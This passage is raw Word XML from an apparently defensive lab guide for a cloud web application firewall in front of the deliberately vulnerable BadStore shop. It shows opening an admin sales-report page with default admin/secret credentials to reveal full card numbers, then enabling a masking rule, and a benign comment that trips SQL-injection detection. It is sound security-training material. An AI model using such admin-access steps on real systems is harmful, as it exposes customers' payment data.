      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="6E278D37">
        <w:rPr/>
        <w:t xml:space="preserve">were in danger of failing the audit because we were </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">showing full credit card numbers, and PCI compliance, and </w:t>
      </w:r>
      <w:r w:rsidR="26954508">
        <w:rPr/>
        <w:t xml:space="preserve">were in danger of </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">legal consequences. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43AF0B7E" w:rsidP="50C40F79" w:rsidRDefault="43AF0B7E" w14:paraId="63929A55" w14:textId="327302DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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43AF0B7E">
        <w:rPr/>
        <w:t>In your web browser, go to</w:t>
      </w:r>
      <w:r w:rsidR="1D1F19D5">
        <w:rPr/>
        <w:t xml:space="preserve"> your WAFaaS Cname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43AF0B7E" w:rsidP="50C40F79" w:rsidRDefault="43AF0B7E" w14:paraId="081FC28F" w14:textId="4490CEE2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr/>
        <w:t>Click on Login/Register</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43AF0B7E" w:rsidP="50C40F79" w:rsidRDefault="43AF0B7E" w14:paraId="582211C1" w14:textId="6AE4FBF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr/>
        <w:t>Login as admin / secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43AF0B7E" w:rsidP="50C40F79" w:rsidRDefault="43AF0B7E" w14:paraId="4748236D" w14:textId="2E022165">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to &lt;your </w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Badstore</w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS name&gt; /</w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>cgi</w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-bin/</w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>badstore.cgi?action</w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="43AF0B7E" w:rsidP="50C40F79" w:rsidRDefault="43AF0B7E" w14:paraId="792876E7" w14:textId="40C226C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="43AF0B7E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Choose View Sales Reports and click “Do It”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="009307BA" w:rsidRDefault="00D140A2" w14:paraId="055B987C" w14:textId="1FD8B522">
      <w:r w:rsidR="00826FB4">
        <w:drawing>
          <wp:inline wp14:editId="01C0F299" wp14:anchorId="32BA03F1">
            <wp:extent cx="5943600" cy="1228090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 11"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1afc470ec1f2472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228090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="50C40F79" w:rsidRDefault="00D140A2" w14:paraId="1B44DA53" w14:textId="25FB0D49">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6B31F7F3">
        <w:rPr/>
        <w:t>As you can see there is PII Leakage of Credit Card details.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="50C40F79" w:rsidRDefault="00D140A2" w14:paraId="3C04217E" w14:textId="218F39F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="532434C9">
        <w:rPr/>
        <w:t>The WAFaaS is not protecting this by default, so we have to add a component to prevent this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="50C40F79" w:rsidRDefault="00D140A2" w14:paraId="6D0745B6" w14:textId="2328CB78">
      <w:pPr/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="50C40F79" w:rsidRDefault="00D140A2" w14:paraId="054D6003" w14:textId="1E8B7E72">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6B31F7F3">
        <w:rPr/>
        <w:t>Blocking PII Leakage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="50C40F79" w:rsidRDefault="00D140A2" w14:paraId="33203AA9" w14:textId="22C65AE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Add the Data Theft Protection component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28FAB926" w:rsidP="21B1CB40" w:rsidRDefault="28FAB926" w14:paraId="05B4B943" w14:textId="33E69DCE">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="28FAB926">
        <w:drawing>
          <wp:inline wp14:editId="57B52594" wp14:anchorId="1E5C864C">
            <wp:extent cx="4197350" cy="1636966"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1023952791" name="Picture 1023952791" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1023952791"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R6a4ac91181af45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7350" cy="1636966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="00D140A2" w:rsidRDefault="00D140A2" w14:paraId="0BF19775" w14:textId="3E788D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on Data Theft Protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="009E7391" w:rsidRDefault="00D140A2" w14:paraId="3518498C" w14:textId="53A25C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Click Add Element.  Give </w:t>
      </w:r>
      <w:r w:rsidR="21A60010">
        <w:rPr/>
        <w:t xml:space="preserve">your Data Theft Element </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="23E0A8FA">
        <w:rPr/>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t>such as “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:rPr/>
        <w:t>reditcards</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00407B87">
        <w:rPr/>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="23E0A8FA">
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> choose Credit Cards for Identity Theft Type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="009E7391" w:rsidRDefault="00D140A2" w14:paraId="4ABE6E42" w14:textId="4AFA27A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="3D9B6E33">
        <w:rPr/>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t>Cloak for the action</w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:rPr/>
        <w:t xml:space="preserve">.  Cloak </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t>will obscure the credit card number</w:t>
      </w:r>
      <w:r w:rsidR="00407B87">
        <w:rPr/>
        <w:t xml:space="preserve"> so the customer can pass the audit.  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>You can leave the 4 initial characters and 0 trailing characters</w:t>
      </w:r>
      <w:r w:rsidR="1BBA3D76">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="005E6CED" w:rsidRDefault="50D9FEAE" w14:paraId="66FBBA9D" w14:textId="627F9D31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="50D9FEAE">
        <w:rPr/>
        <w:t xml:space="preserve">Refresh the “View Sales Reports”.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="005E6CED" w:rsidRDefault="50D9FEAE" w14:paraId="2E8C295A" w14:textId="291FE661">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t xml:space="preserve">You will </w:t>
      </w:r>
      <w:r w:rsidR="2FED1E4B">
        <w:rPr/>
        <w:t xml:space="preserve">see </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t>most of the credit card numbers have been obscured</w:t>
      </w:r>
      <w:r w:rsidR="75A3BDE5">
        <w:rPr/>
        <w:t>.  T</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t xml:space="preserve">he few that </w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t>are not are</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t xml:space="preserve"> not valid </w:t>
      </w:r>
      <w:r w:rsidR="1A668983">
        <w:rPr/>
        <w:t>credit card number</w:t>
      </w:r>
      <w:r w:rsidR="00220C64">
        <w:rPr/>
        <w:t xml:space="preserve">s to begin with.  </w:t>
      </w:r>
      <w:r w:rsidR="00497083">
        <w:drawing>
          <wp:inline wp14:editId="1B215242" wp14:anchorId="55753988">
            <wp:extent cx="5378450" cy="1170502"/>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6e6c12bc17394c2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78450" cy="1170502"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8004C" w:rsidP="00B8004C" w:rsidRDefault="00B8004C" w14:paraId="7FA80A19" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B2651A" w:rsidRDefault="00B2651A" w14:paraId="385A072F" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D140A2" w:rsidP="50C40F79" w:rsidRDefault="00D450FF" w14:paraId="5B428DB0" w14:textId="0183B99F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidR="7F8F81F8">
        <w:rPr/>
        <w:t xml:space="preserve">Adding an Exception for a </w:t>
      </w:r>
      <w:r w:rsidR="73122DFD">
        <w:rPr/>
        <w:t xml:space="preserve">simple </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>False Positive</w:t>
      </w:r>
      <w:r w:rsidR="00D450FF">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5EF02DAB" w:rsidP="50C40F79" w:rsidRDefault="5EF02DAB" w14:paraId="514CC72A" w14:textId="389E03EF">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="864"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="5EF02DAB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes the WAF may </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="3E56B11A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by default </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="5EF02DAB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>block something we want to allow</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="2720EEA5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>.  This is known as a false positive. In this case, we</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="5EF02DAB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> need to make </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="082F4C36">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="5EF02DAB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>exception</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="05C63FDB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>.  This is known as fixing a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="24DC13B2" w14:paraId="0C60E1FD" w14:textId="6624F7EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2ECD76F9">
        <w:rPr/>
        <w:t>Go to your WAFaaS CNAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="24DC13B2" w14:paraId="33B59A21" w14:textId="5F0E008D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="2ECD76F9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Click on Leave comment, enter a name and email and then the following for the comment text:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="24DC13B2" w14:paraId="2DF90676" w14:textId="2A3EA80F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="2ECD76F9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>I tried to order from the union of your stores, but when I try to select a product, from your selection, I cannot!</w:t>
      </w:r>
      <w:r w:rsidR="2ECD76F9">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="24DC13B2" w14:paraId="51720D3B" w14:textId="610180E6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2ECD76F9">
        <w:rPr/>
        <w:t xml:space="preserve">You will see you are </w:t>
      </w:r>
      <w:r w:rsidR="24DC13B2">
        <w:rPr/>
        <w:t>blocked from posting the comment</w:t>
      </w:r>
      <w:r w:rsidR="4C409CA1">
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="4C72CD17">
        <w:drawing>
          <wp:inline wp14:editId="23C38C98" wp14:anchorId="3FF86766">
            <wp:extent cx="2028825" cy="1202989"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713045915" name="Picture 1713045915" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1713045915"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1e6588506fee4c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8825" cy="1202989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="41D95CE2">
        <w:rPr/>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2C24694F" w:rsidP="3DB4835F" w:rsidRDefault="3F6CA8C4" w14:paraId="370FCAF3" w14:textId="09E619CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="76B4FA07">
        <w:rPr/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>ook at the Firewall Log</w:t>
      </w:r>
      <w:r w:rsidR="1C3A9038">
        <w:rPr/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> to see why the request was blocked</w:t>
      </w:r>
      <w:r w:rsidR="3F6CA8C4">
        <w:drawing>
          <wp:inline wp14:editId="31D70519" wp14:anchorId="5666C10B">
            <wp:extent cx="3241268" cy="1376357"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="546672717" name="Picture 546672717" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 546672717"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R254953f56a2347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1268" cy="1376357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="003B48A4" w14:paraId="31CD4146" w14:textId="1CD4A1A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="172E7C79">
        <w:rPr/>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="515053AD">
        <w:rPr/>
        <w:t xml:space="preserve">need to </w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:rPr/>
